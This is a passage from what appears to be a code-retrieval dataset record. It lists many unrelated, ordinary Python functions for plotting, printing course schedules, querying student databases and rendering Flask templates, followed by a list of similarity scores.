len(lliIndices[index]))\n subPlot.text(0.02, 0.95 - index * 0.0375, annotateTxt, verticalalignment='bottom', horizontalalignment='left', transform=subPlot.transAxes, color=sigTypeColor, fontsize=12)\n\n # make x-axis a hh:mm:ss\n ax = plt.gca()\n xfmt = md.DateFormatter('%H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n\n # adjust range for Y axis\n axes = plt.gca()\n axes.set_ylim(mPlt.adjustYAxisLimits(axes))\n axes.set_xlim(mPlt.adjustXAxisLimits(axes))\n\n plt.text(0, -0.125, r'$\\copyright$ Alain Muls (alain.muls@rma.ac.be)', horizontalalignment='left', verticalalignment='bottom', transform=ax.transAxes, alpha=0.5, fontsize='x-small')\n plt.text(1, -0.125, r'$\\copyright$ Frederic Snyers (fredericsn@gmail.com)', horizontalalignment='right', verticalalignment='bottom', transform=ax.transAxes, alpha=0.5, fontsize='x-small')\n # mPlt.annotateText(r'$\\copyright$ Alain Muls (alain.muls@rma.ac.be)', subPlot, 0, -0.12, 'left', fontsize='x-small')\n # mPlt.annotateText(r'$\\copyright$ Frederic Snyers (fredericsn@gmail.com)', subPlot, 1, -0.12, 'right', fontsize='x-small')\n\n fig = plt.gcf()\n # fig.set_size_inches(12*2.5, 9*2.5)\n fig.savefig('%s-%s%d-locktime.png' % (gnssSyst, gnssSystShort, gnssPRN), dpi=fig.dpi)\n\n if verbose:\n plt.show(block=False) # block=False)\n\n # close the figure\n # plt.close()", "def showClock(hour: int, min: int):\n pass", "def printSchedule():\r\n print(\"{0:^45}\".format(\"Your Schedule:\\n\"))\r\n print(\" Day Class Time\")\r\n if(len(classes) == 0):\r\n print(\"\\nThere are no classes\\n\")\r\n return\r\n for class_ in classes:\r\n print(class_.scheduleString())\r\n print()", "def plot_time(time_to_complete, plot_num):\n average = []\n for i, point in enumerate(time_to_complete):\n average.append(sum(time_to_complete[:i+1])/ (i+1))\n plt.plot(time_to_complete, color= 'blue', label=\"Epoch Time\")\n plt.plot(average, color = 'red', label= \"Average Time\", zorder = 3)\n plt.legend()\n plt.title(\"Time to complete FetchReach\")\n plt.ylabel(\"Time (seconds)\")\n plt.xlabel(\"Number iterations\")\n plt.savefig(\"./plots/time/time_to_complete_{}.png\".format(plot_num))\n plt.clf()", "def list_experiments(self):\n subfolders = self.um.list_subfolders(\"data/*/\")\n experiment_folders = self.um.list_experiments(subfolders)\n experiments = list()\n for exp in experiment_folders:\n try:\n date = self.um.timestamp_to_date(int(exp) / 1000)\n exp_class = experiment.experiment(new_experiment=False, ts=exp)\n\n if \"label\" in exp_class.metadata:\n label = exp_class.metadata[\"label\"]\n else:\n label = None\n\n exp_dict = {\"date\": date,\n \"ts\": exp,\n \"label\": label\n }\n experiments.append(exp_dict)\n except:\n print \"Skipped\"\n\n return render_template('experiments.html', user=experiments)", "def getTimes():", "def getTimes():", "def getTimes():", "def view_all_students():\n message = ''\n global conn\n with conn:\n rows = select_all_students(conn)\n for row in rows:\n message += str(row) + \"\\n\"\n messagebox.showinfo('Student Table', message)", "def queriesInEachHour(self):\n hours = 0\n\n #prints out each element (with number of DB Queries) of array\n while hours < 24:\n print (hours,'to',hours+1, ' : ', self.arrayOfTimes[hours])\n hours += 1", "def timeline(self, **kwargs):\n\n def rtm(n, multiple=10):\n \"\"\"Round to multiple.\"\"\"\n return int(multiple * round(float(n) / multiple))\n\n beginning_minutes = 7 * 60 + 20 # starting time is 7:20\n end_minutes = 21 * 60 # ending time is 21:00\n\n interval = 100 # 100 minutes for each period (90 + 10)\n\n 
total_minutes = ((end_minutes - beginning_minutes) // interval + 1) * interval\n number_of_intervals = total_minutes // interval\n\n segments = total_minutes // 10\n days = {i: [[' '] * segments + ['│']] for i in range(5)}\n\n for course in self.get_sorted_courses(include_unscheduled=False):\n i = (rtm(course.time.start) - beginning_minutes) // 10\n width = (rtm(course.time.end) - rtm(course.time.start)) // 10\n\n day = 0\n for j in range(i, i + width):\n if days[course.weekday()][day][j] != ' ':\n day += 1\n if len(days[course.weekday()]) == day:\n days[course.weekday()].append([' '] * segments + ['│'])\n\n days[course.weekday()][day][i] = '{'\n days[course.weekday()][day][i + width - 1] = '}'\n\n space = width - 2 # width minus { and }\n\n name = Ansi.color(\n course.abbreviation\n if len(course.abbreviation) <= space\n else course.abbreviation[: space - 1] + \".\",\n course_types[course.type].color,\n )\n\n # TODO: this doesn't center correctly, for some reason\n name = Ansi.center(name, space)\n\n days[course.weekday()][day][i + 1] = name\n for j in range(i + 2, i + width - 1):\n days[course.weekday()][day][j] = ''\n\n # print the header\n print(\n (\" ╭\" + \"─\" * (total_minutes // 10) + \"╮\\n │\")\n + \"\".join(\n Ansi.bold(\n minutes_to_HHMM(beginning_minutes + interval * i)\n .strip()\n .ljust(10, \" \")\n )\n for i in range(number_of_intervals)\n )\n + \"│\\n╭────┼─\"\n + \"\".join(\n \"─\" * number_of_intervals\n + (\"─\" if i != number_of_intervals - 1 else \"┤\")\n for i in range(number_of_intervals)\n )\n )\n\n for i in range(5):\n x = f\"│ {WD_EN[i][:2].capitalize()} │\"\n\n for j, day in enumerate(days[i]):\n if j == 0:\n print(x, end=\"\")\n else:\n print(\"│ │\", end=\"\")\n\n print(\"\".join(day))\n\n # print the very last line\n print(\n \"╰────┴─\"\n + \"\".join(\n \"─\" * number_of_intervals\n + (\"─\" if i != number_of_intervals - 1 else \"╯\")\n for i in range(number_of_intervals)\n )\n )", "def pp_schedule(filename,venue):\n #reading the file\n f = open(filename,\"r\")\n incsv = f.readlines()\n #removing affixes\n incsv[:] = [i.rstrip('\\n') for i in incsv]\n #lines into lists\n tempstr = \"\"\n templist = []\n for j in range(len(incsv)):\n #enters each line into temporary string variable\n tempstr = incsv[j]\n #enters the split string into a temporary list variable\n templist.append(tempstr.split(\",\"))\n #modify original line in original list with split list\n incsv[j] = templist\n #reset temporary variables\n tempstr = \"\"\n templist = []\n #timelist stands for timetable list\n #format of timelist: [[day,[start,end,module],...],...]\n timelist = []\n for k in range(1,8):\n #for each day code add day code\n timelist.append([k])\n #assign and make list for ttint\n #for all lines in file\n for l in range(len(incsv)):\n #if venue in line matches desired venue\n if incsv[l][0][7] == venue:\n #after each day code, add a list with start time, end time and module. Repeat for each relevant line\n timelist[(int(incsv[l][0][3])-1)].append([int(incsv[l][0][5]),int(incsv[l][0][6]),incsv[l][0][0]])\n #turtle\n print(\"Your timetable is being printed on Python Turtle Graphics. 
This may take a while.\")\n ttint(timelist,venue)", "def mean_time():\n return render_template('mean_time_weekday.html')", "def print_tasks(self):\n unformatted_rows = self.db_link.get_tasks()\n formatted_rows = self.display.format_row(unformatted_rows)\n self.display.print_task_list_formatted(formatted_rows)", "def display_get_date_avg():\n average_date = reports.get_date_avg(filename)\n print(\n \"The average date for all games in {} is: {}\\n\".format(\n filename,\n average_date))", "def plot_task_learnability(task_times: dict, ax: Axes = None) -> Axes:\n means = Series({\n trial_name: mean(times)\n for trial_name, times in task_times.items()\n })\n ax = ax or new_axes()\n means.plot(kind='line', ax=ax, marker=\"s\")\n ax.set_xlabel('Trials')\n ax.set_ylabel('Time-on-Task (Sec')\n ax.set_ylim(0, 80)\n\n return ax", "def print_schedule():\n clear_screen()\n print(\"====Current Schedule====\")\n days = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']\n with open('current_courses.json', 'r') as current_file:\n schedule = json.load(current_file)\n for day in days:\n for val, val2 in schedule.items():\n if day in val2[0]:\n print(day, val, str(val2[1])+'-'+str(val2[2])+\" Presumed Grade: \"+ val2[3])\n return 0", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def output_format(times_list):\n formatted_free_times = []\n for i in times_list:\n fmt_str = \"{} to {}.\".format(\n i[0].format('ddd, MMM D, h:mm a'),\n i[1].format('ddd, MMM D, h:mm a'))\n formatted_free_times.append(fmt_str)\n return formatted_free_times", "def overview():\n subjects = get_latest(10)\n return render_template('subject.html', subjects=subjects)", "def display_averaging(self):\r\n\r\n cwd = os.getcwd()\r\n path = cwd + \"/results\"\r\n df1 = pd.read_csv(path + \"/average_U.csv\") # black line\r\n df2 = pd.read_csv(path + \"/average_N.csv\") # green line\r\n chem = 25 # from 0 to 35\r\n\r\n s1 = df1.iloc[chem]\r\n s1.plot()\r\n\r\n plt.show()", "def top_students_table(course):\n\n return 'COURSE {}\\n'.format(course) + \\\n '\\n'.join('{:10} --- {:4}'.format(*rate)\n for rate in itertools.islice(get_rates(students_data(), course), 3))", "def display_all():\n results = artwork_db.get_all_artwork()\n for artist in results:\n print(artist)", "def show(self):\n i = 0\n print()\n for task in self.tasks:\n print(\"\\t\", i + 1, \". 
\", task.name, \"(\", task.priority, \")\")\n i += 1", "def plot_time_advances(self, path: str = None, methods: list = None, title=None):\n df = self.get_results(methods)\n ax = plt.axes()\n sns.lineplot(x='epoch', y='value', data=df, hue='statistics', style='method', ax=ax)\n plt.ylim(-31, 11)\n plt.ylabel('test statistics of log-lkl')\n lgd = plt.legend(loc='upper left', bbox_to_anchor=[1.01, -0.1, 0.2, 0.8], ncol=1)\n ax.set_position([0.1, 0.1, 0.75, 0.8])\n if title is not None:\n ax.set_title(title)\n if path is not None:\n for extension in ['eps', 'png']:\n plt.savefig(f'{path}.{extension}', format=extension)", "def display_hours(employee_id):\n\n if not g.user:\n flash(\"Please Login to continue.\", \"danger\")\n return redirect(\"/\")\n \n employee = Employee.query.get_or_404(employee_id)\n\n labels = json.dumps( [\"Completed\", \"Required\"])\n data = json.dumps([employee.completed, employee.required])\n \n return render_template(\"users/display_hours.html\", employee = employee, labels = labels, data = data)", "def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)", "def show_report(*args):\n for report in args:\n os.startfile(report)", "def PlotTimes(metadata, data):\n\n gp = Gnuplot.Gnuplot(persist=1)\n gp('set data style impulses')\n gp('set xtics 1')\n gp.clear()\n gp.xlabel('seconds')\n gp.ylabel('duration in second')\n gp.title(metadata.AsTitle())\n styles = {}\n line_style = 1\n\n for dataset in data:\n x = numpy.array(dataset.time, dtype='float_')\n if not dataset.name in styles:\n styles[dataset.name] = line_style\n line_style += 1\n d = Gnuplot.Data(x, dataset.data,\n title=dataset.name,\n with_='impulses ls %d' % styles[dataset.name])\n else: # no need to repeat a title that exists already.\n d = Gnuplot.Data(x, dataset.data,\n with_='impulses ls %d' % styles[dataset.name])\n\n gp.replot(d)\n gp.hardcopy('/tmp/%s-%s-%f.png' %\n (metadata.name, metadata.kernel, metadata.duration),\n terminal='png')", "def plot_stamps(stamps, fig=None, columns=3):\n num_stamps = len(stamps)\n num_rows = math.ceil(num_stamps / columns)\n\n # Create a new figure if needed.\n if fig is None:\n fig = plt.figure()\n\n for i in range(num_stamps):\n ax = fig.add_subplot(num_rows, columns, i + 1)\n ResultsVisualizer.plot_single_stamp(stamps[i], axes=ax)\n ax.set_title(f\"Time {i}\")", "def student_summary() -> str:\n db_path: str = \"810_startup.db\"\n\n try:\n db: sqlite3.Connection = sqlite3.connect(db_path)\n except sqlite3.OperationalError:\n return f'Error: Unable to open database at path {db_path}'\n else:\n query: str = \"select students.Name, students.CWID, grades.Course, grades.Grade, instructors.Name from students,grades,instructors where students.CWID=StudentCWID and InstructorCWID=instructors.CWID order by students.Name\"\n data: Dict[str, str] = [{'Name': name, 'CWID': cwid, 'Course': course, 'Grade': grade, 'Instructor': instructor} for name, cwid, course, grade, instructor in db.execute(query)]\n\n db.close()\n\n return render_template(\n 'students.html',\n title = 'Stevens Repository',\n table_title = 'Students 
Summary',\n students = data)", "def printSchedule(self):\n\t\tself.printWaiting()\n\t\tprint ' '.join(map(format,range(20),['2' for _ in range(20)]))\n\t\tprint \"\"", "def list_snapshots(args):\n html_doc = document.Document(get_code(args.file))\n edition, region, snapshots = html_doc.list(date=args.edition, region=args.region)\n print('Snapshots for {:s} {:%B %d, %Y}'.format(region.capitalize(), edition))\n for i in range(len(snapshots)):\n print('({:2d}) {!r:} -'.format(i, snapshots[i][1]) +\n ' {0:%B} {0.day:2}, {0:%Y %l:%M:%S.%f %p}'.format(snapshots[i][0]))", "def required_slots(tracker: Tracker) -> List[Text]:\n return [\n \"sucursal\",\n \"fecha_hora\"\n ]", "def print_event(self):\n\n list_of_names = [str(c) for c in self.__list_of_contacts]\n joined_names = ', '.join(list_of_names)\n table = [[str(self._title)],[\"Date: \"+str(self._date)],[\"Time: \"+str(self._start)+\" - \"+str(self._end)],[\"Participants: \"+str(joined_names)]]\n print(tabulate(table, tablefmt='grid'))", "def import_sat(filenames):\n\t# import SAT scores for each grade\n\t# l = []\n\t# for file in filenames:\n\t# \tdf = pd.read_excel(file, skiprows=9, usecols=['Student ID', 'Total Score', 'ERW', 'Math'])\n\t# \t# drop students with missing IDs\n\t# \tdf.dropna(inplace=True)\n\t# \t# make ID an integer and index\n\t# \tdf['Student ID'] = df['Student ID'].apply(lambda x: int(x))\n\t# \t# rename columns \t\t\n\t# \tdf = df.rename(index=int, columns={'Student ID':'ID', 'Total Score':'composite_sat', \n\t# \t\t\t\t\t'Math':'math_sat', 'ERW':'erw_sat'})\n\t# \t# index by ID\n\t# \tdf.set_index('ID')\n\t# \tl.append(df)\n\n\t# nine, ten, eleven = l\n\t# sat_df = nine.append([ten, eleven])\n\t# sat_df = sat_df.set_index('ID')\n\n\t# return sat_df\n\n\t# EDIT FOR NEW SAT SCORES #\n\tl = []\n\tfor file in filenames:\n\t\tdf = pd.read_excel(file, skiprows=9, usecols=['Student ID', 'Total Score', 'ERW', 'Math'])\n\t\t# drop students with missing IDs\n\t\tdf.dropna(inplace=True)\n\t\t# make ID an integer and index\n\t\tdf['Student ID'] = df['Student ID'].apply(lambda x: int(x))\n\t\t# rename columns \t\t\n\t\tdf = df.rename(index=int, columns={'Student ID':'ID', 'Total Score':'composite_sat', \n\t\t\t\t\t\t'Math':'math_sat', 'ERW':'erw_sat'})\n\t\t# index by ID\n\t\tdf.set_index('ID')\n\t\t# fill each column with temporary info\n\t\tdf['composite_sat'] = 'Scores coming in mid-May'\n\t\tdf['math_sat'] = 'Scores coming in mid-May'\n\t\tdf['erw_sat'] = 'Scores coming in mid-May'\n\t\tl.append(df)\n\n\tnine, ten, eleven = l\n\tsat_df = nine.append([ten, eleven])\n\tsat_df = sat_df.set_index('ID')\n\n\treturn sat_df", "def create_timeslots_at_interval():\n LOGGER.info(\"refreshing the timeslots\")\n timeslot_engine.generate_time_slots_from_range('9:00', '18:00')\n LOGGER.info(\"done refreshing the timeslots...\")", "def showAlerts(self):\n for string, ids in self.alerts.iteritems():\n idstring = ', '.join(ids)\n print(string, idstring)", "def leader_list():\n\n add_trainee_form = AddTraineeForm()\n return render_template(\n \"leaders_list.html\",\n add_trainee_form=add_trainee_form,\n title=\"Encadrants\",\n )", "def display_simple(self):\n print(\"\") \n print(\"Date: {}\".format(self.date))\n print(\" Task name: {}\".format(self.task_name))\n print(\" Time spent: {} minutes\".format(self.time_spent))\n print(\" Notes: {}\".format(self.notes))\n print(\" Task number: {}\".format(self.task_number))\n print(\"\")", "def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = 
self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)", "def plotTime(self):\n plt.figure()\n t = [i for i in range(len(self.nodes_infected))]\n print(t)\n plt.title('Nodos infectados vs Tiempo')\n plt.xlabel('Instantes de tiempo')\n plt.ylabel('# de nodos infectados')\n plt.plot(t, self.nodes_infected)\n plt.grid(True)\n plt.show()", "def ttint(timelist,venue):\n #setup\n showturtle()\n #make python turtle graphics window 1260 pixels wide and 800 pixels tall\n setup(width = 1260, height = 800, startx = None, starty = None)\n reset()\n #text at top\n pen(pencolor=\"black\")\n pu()\n setpos(0,380)\n write(\"Welcome to your schedule. Use the arrow keys to toggle the day of the week\",move=False,align=\"center\",font=(\"Courier New\",10,\"normal\"))\n setpos(0,360)\n write(\"In Idle, type 'quit()' to exit turtle.\",move=False,align=\"center\",font=(\"Courier New\",10,\"normal\"))\n dayl = [\"Mon\",\"Tue\",\"Wed\",\"Thu\",\"Fri\",\"Sat\",\"Sun\"]\n setpos(0,-350)\n #writes venue at bottom of GUI\n write(venue,move=False,align=\"center\",font=(\"Courier New\",20,\"normal\"))\n #drawing the lines and timing\n #baseY = 300 because y = 300 is the height of the line for monday\n baseY = 300\n for ch in range(7):\n pu()\n #goes to relevant y position for respective day code\n setpos(-570,(baseY-(100*ch)))\n #writes day name at side\n write(dayl[ch],move=False,align=\"center\",font=(\"Courier New\",20,\"normal\"))\n pen(pencolor=\"black\",pensize=\"3\")\n #draws lines\n #for each hour\n for dh in range(19):\n #move right 60 steps\n setx(xcor()+60)\n pd()\n #move up 20 steps\n sety(ycor()+20)\n pu()\n #stop drawing. move up 10 steps and write hour\n sety(ycor()+10)\n write(str((600+(dh*100))),move=False,align=\"center\",font=(\"Courier New\",10,\"normal\"))\n #go back down 30 steps to main line\n sety(ycor()-30)\n #continue drawing\n pd()\n pu()\n #goes to each relevant timing to write module code\n #for every time range in timelist. dp stands for day parse\n for dp in range(len(timelist)):\n #if week day in timelist is not empty\n if len(timelist[dp]) >= 1:\n #for each timing in the week day. hp stands for hour parse\n for hp in range(1,len(timelist[dp])):\n #for each hour in the time range. 
pr is an arbitrary variable which helps to direct the turtle to the timings in between the start and end time to write the module code at the relevant location\n for pr in range(int((timelist[dp][hp][1]-timelist[dp][hp][0])/100)):\n #go to the relevant time and write the module code in between\n setpos((-840+(int(timelist[dp][hp][0]/100)+pr)*60),(410-timelist[dp][0]*100))\n write(timelist[dp][hp][2],move=False,align=\"center\",font=(\"Courier New\",8,\"normal\"))", "def index():\n groups = list(map(lambda x: x.json(), GroupModel.query.all())) \n return render_template('dashboard/schedules.html', groups=groups)", "def print_results():\n now_time = time.time()\n diff_time_in_sec = now_time - start_time\n generated_per_second = total / diff_time_in_sec\n generated_per_hour = 3600 * generated_per_second\n saved_per_second = success / diff_time_in_sec\n saved_per_hour = 3600 * saved_per_second\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(f\"{'Generated:' : <16}{total : <12}\")\n print(f\"{'New graphs:' : <16}{success : <12}\")\n print(f\"{'Success rate:' : <16}{round((success / total) * 100, 3) : <7} %\")\n print(f\"{'Speed:' : <16}{round(generated_per_hour) : <7} graphs/h\")\n print(f\"{'Save speed:' : <16}{round(saved_per_hour) : <7} graphs/h\")", "def list(self, option: str = \"\", short=False, **kwargs):\n courses = self.get_sorted_courses()\n\n if option == \"plain\":\n if short:\n for course in sorted(courses, key=lambda x: x.name + x.type):\n print(f\"{course.name} ({course.type})\")\n else:\n for course in sorted(courses, key=lambda x: x.abbreviation + x.type):\n print(f\"{course.abbreviation}-{course.type[0]}\")\n quit()\n\n current_day = datetime.today()\n current_weekday = current_day.weekday()\n\n # split to scheduled and non-scheduled\n unscheduled = [c for c in courses if c.time is None]\n courses = [c for c in courses if c not in unscheduled]\n\n table = []\n option = option.lower()\n\n for i, course in enumerate(courses):\n # lambda functions to test for various options\n # a is current weekday and b is the course's weekday\n options = {\n \"\": lambda _, __: True, # all of them\n \"t\": lambda a, b: a == b, # today\n \"tm\": lambda a, b: (a + 1) % 7 == b, # tomorrow\n \"mo\": lambda a, b: b == 0,\n \"tu\": lambda a, b: b == 1,\n \"we\": lambda a, b: b == 2,\n \"th\": lambda a, b: b == 3,\n \"fr\": lambda a, b: b == 4,\n \"sa\": lambda a, b: b == 5,\n \"su\": lambda a, b: b == 6,\n }\n\n if option not in options:\n exit_with_error(\"Invalid course-listing option!\")\n\n if options[option](current_weekday, course.weekday()):\n # include the name of the day before first day's course\n if courses[i - 1].time.day != courses[i].time.day:\n weekday = course.time.day.capitalize()\n\n # calculate the next occurrence\n date = (\n current_day\n + timedelta(days=(course.weekday() - current_weekday) % 7)\n ).strftime(\"%-d. 
%-m.\")\n\n table.append([f\"{weekday if not short else weekday[:3]} / {date}\"])\n\n # for possibly surrounding the name with chars if it's ongoing\n name_surround_char = \"•\" if course.is_ongoing() else \"\"\n\n row = [\n f\"{name_surround_char}{course.name if not short else course.abbreviation}{name_surround_char}\",\n f\"{minutes_to_HHMM(course.time.start)} -\"\n f\" {minutes_to_HHMM(course.time.end)}\"\n + (\n \"\"\n if course.time.weeks is None\n else (\n f\" ({course.time.weeks if not short else course.time.weeks[0]})\"\n )\n ),\n \"-\" if course.classroom is None else course.classroom.number,\n ]\n\n # color the course name the appropriate color, depending on its type\n row[0] = Ansi.color(row[0], course_types[course.type].color)\n\n # append useful information\n table.append(row)\n\n # list unscheduled courses only when no options are specified\n if option == \"\" and len(unscheduled) != 0:\n table.append([\"Unscheduled\"])\n for course in unscheduled:\n table.append(\n [\n course.name if not short else course.abbreviation,\n course.type[0],\n \"-\",\n \"-\",\n ]\n )\n\n if len(table) == 0:\n exit_with_error(\"No courses matching the criteria found!\")\n\n print_table(table)", "def list_aspects(request, pk):\n category = get_object_or_404(GradeCategory, pk=pk)\n aspects = GradeCategoryAspect.objects.filter(Category=category)\n ts = get_timeslot()\n return render(request, \"results/list_aspects.html\", {\n \"aspects\": aspects,\n 'ts': ts,\n 'cat': category,\n })", "def insert_time(self):\n if self.controller.shared_data.obj_track.size == 0:\n message = 'There is no loaded track to insert timestamp'\n messagebox.showwarning(title='Insert Time Assistant',\n message=message)\n return\n\n self.timestamp = dt.datetime(2000, 1, 1, 0, 0, 0)\n self.speed = 0\n\n spinbox_options = {'year': [1990, 2030, 2000],\n 'month': [1, 12, 1],\n 'day': [1, 31, 1],\n 'hour': [0, 23, 0],\n 'minute': [0, 59, 0],\n 'second': [0, 59, 0]}\n\n top = tk.Toplevel()\n top.title('Insert Time Assistant')\n\n # Insert data frame\n frm_form = tk.Frame(top, relief=tk.FLAT, borderwidth=3)\n frm_form.pack() # insert frame to use grid on it\n spn_time = collections.defaultdict()\n\n for i, entry in enumerate(spinbox_options):\n # This allow resize the window\n top.columnconfigure(i, weight=1, minsize=75)\n top.rowconfigure(i, weight=1, minsize=50)\n\n # Create widgets\n var = tk.StringVar(top)\n var.set(spinbox_options[entry][2])\n\n spn_time[entry] = tk.Spinbox(from_=spinbox_options[entry][0],\n to=spinbox_options[entry][1],\n master=frm_form,\n width=8,\n textvariable=var,\n justify=tk.RIGHT,\n relief=tk.FLAT)\n\n lbl_label = tk.Label(master=frm_form, text=f'{entry}', anchor='w')\n\n # Grid\n lbl_label.grid(row=i, column=0) # grid attached to frame\n spn_time[entry].grid(row=i, column=1)\n\n # Insert speed\n i = len(spn_time)\n top.columnconfigure(i, weight=1, minsize=75)\n top.rowconfigure(i, weight=1, minsize=50)\n spn_speed = tk.Spinbox(from_=0, to=2000,\n master=frm_form,\n width=8,\n justify=tk.RIGHT,\n relief=tk.FLAT)\n lbl_label = tk.Label(master=frm_form, text='speed (km/h)', anchor='w')\n lbl_label.grid(row=i, column=0, pady=10)\n spn_speed.grid(row=i, column=1)\n\n def _insert_timestamp():\n # Check input data and insert timestamp\n try:\n self.timestamp = dt.datetime(int(spn_time['year'].get()),\n int(spn_time['month'].get()),\n int(spn_time['day'].get()),\n int(spn_time['hour'].get()),\n int(spn_time['minute'].get()),\n int(spn_time['second'].get()))\n self.speed = float(spn_speed.get())\n if self.speed 
<= 0:\n raise ValueError('Speed must be a positive number.')\n\n # Insert timestamp\n self.controller.shared_data.obj_track.\\\n insert_timestamp(self.timestamp, self.speed)\n top.destroy()\n\n except (ValueError, OverflowError) as e:\n messagebox.showerror('Input Error', e)\n\n def _clear_box():\n for s in spn_time:\n spn_time[s].delete(0, 8)\n spn_time[s].insert(0, spinbox_options[s][2])\n spn_speed.delete(0, 8)\n spn_speed.insert(0, 0)\n\n # Button frame\n frm_button = tk.Frame(top)\n frm_button.pack(fill=tk.X, padx=5,\n pady=5) # fill in horizontal direction\n\n btn_clear = tk.Button(master=frm_button, text='Clear',\n command=_clear_box)\n btn_submit = tk.Button(master=frm_button, text='Submit',\n command=_insert_timestamp)\n btn_clear.pack(side=tk.RIGHT, padx=10)\n btn_submit.pack(side=tk.RIGHT, padx=10)" ]
[ "0.5666389", "0.5338114", "0.5279143", "0.51949066", "0.51755744", "0.51437485", "0.51287425", "0.51153266", "0.51038504", "0.5092183", "0.5066873", "0.504833", "0.5036777", "0.5032361", "0.50242746", "0.5023967", "0.50215155", "0.4967114", "0.496651", "0.49573854", "0.4937227", "0.49314487", "0.49239922", "0.48797157", "0.48743242", "0.48378047", "0.4830392", "0.48237115", "0.48199943", "0.48095345", "0.480702", "0.4800872", "0.47956583", "0.47729596", "0.47685894", "0.47685385", "0.47651872", "0.47579458", "0.47464067", "0.47419292", "0.47407645", "0.4739984", "0.47211984", "0.47001803", "0.46992368", "0.46941218", "0.46940178", "0.46743628", "0.4640633", "0.4640237", "0.46379346", "0.46376356", "0.4631618", "0.46304545", "0.46170205", "0.46138337", "0.46117362", "0.4609494", "0.46093804", "0.46093804", "0.46093804", "0.46082044", "0.4606311", "0.46058935", "0.4600324", "0.4597141", "0.45864072", "0.45817745", "0.4580489", "0.45788524", "0.4575756", "0.45744997", "0.45719805", "0.45707735", "0.4568935", "0.4566536", "0.45646912", "0.45565715", "0.45496482", "0.4543455", "0.4541122", "0.45243725", "0.4516492", "0.45047662", "0.45016852", "0.44963232", "0.44961593", "0.44925848", "0.44908547", "0.4488033", "0.44877476", "0.44871035", "0.4486304", "0.44844106", "0.4482715", "0.44817835", "0.448072", "0.44748625", "0.44745156", "0.4473694", "0.44685072" ]
0.0
-1
Error raised when formatting a string but a config value is missing.
def __init__(self, key, parent=None):
    if parent:
        msg = f"Missing config while rendering {parent}: {key}"
    else:
        msg = f"Missing config: {key}"
    super(MissingConfiguration, self).__init__(msg)
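A minimal sketch of how this exception might be raised in practice; the require_config helper, its name, and the example key/template names are assumptions for illustration, not taken from the record above:

# Assumes the MissingConfiguration class shown above (an Exception subclass
# whose __init__ is the constructor in the document field).
def require_config(config, key, parent=None):
    """Hypothetical lookup helper (assumed name): fetch a key or raise with context."""
    try:
        return config[key]
    except KeyError:
        # parent identifies the template being rendered when the lookup failed,
        # so the message names what was being formatted at the time.
        raise MissingConfiguration(key, parent=parent)

# Example: require_config({}, "db_url", parent="settings.html") raises
# MissingConfiguration with the message
# "Missing config while rendering settings.html: db_url".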
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def test_single_specifier_missing(self):\n template = 'missing'\n value_count = 1\n msg = 'The formatter should contain one \"{}\" specifier.'\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def raiser(string):\n raise Exception(f'Please check your config.json file, {string} is missed or wrong.')", "def test_config_from_text_malformed_content():\n config_text = \"Malformed content inside config text\"\n with pytest.raises(Exception):\n Config(text=config_text)", "def get_formatted_string(self, input_string):\n if isinstance(input_string, str):\n try:\n return self.get_processed_string(input_string)\n except KeyError as err:\n # Wrapping the KeyError into a less cryptic error for end-user\n # friendliness\n missing_key = err.args[0]\n raise KeyNotInContextError(\n f'Unable to format \\'{input_string}\\' with '\n f'{{{missing_key}}}, because '\n f'context[\\'{missing_key}\\'] doesn\\'t exist') from err\n else:\n raise TypeError(f\"can only format on strings. {input_string} is a \"\n f\"{type(input_string)} instead.\")", "def _raise_value_error(self, option, typestring, value):\n qual = option._qualified_name()\n if qual[0] == 'trac.ini':\n raise ConfigurationError(\n _('trac.ini [%(sec)s] %(opt)s = \"%(val)s\": invalid %(type)s',\n sec=self.section, opt=qual[1],\n type=typestring, val=repr(value)))\n if qual[0] == 'macroarg':\n raise ValueError(\n _('macro argument %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))\n if qual[0] == 'default':\n raise TracError(\n _('plugin default %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))", "def test_init_with_format_str_and_header_True_raises_error(self):\n with pytest.raises(ValueError):\n _ = CSVFormatter(fmt_str=\"\", header=True)", "def test_incorrect_format_1(self):\n changelog = changelog_temp.format(\n before_changelog=\"## [Not yet released]\\n\\n### Added\\n\\n- Added a new feature\\n\"\n )\n with pytest.raises(ValueError):\n parse_changelog(changelog)", "def test_invalid_config_cli_param(self):\n\n self.render_config_template(\n console={\"pretty\": \"false\"}\n )\n\n # first run with default config, validating config being\n # actually correct.\n proc = self.start_beat()\n self.wait_until(lambda: self.log_contains(\"mockbeat start running.\"))\n proc.check_kill_and_wait()\n\n # start beat with invalid config setting on command 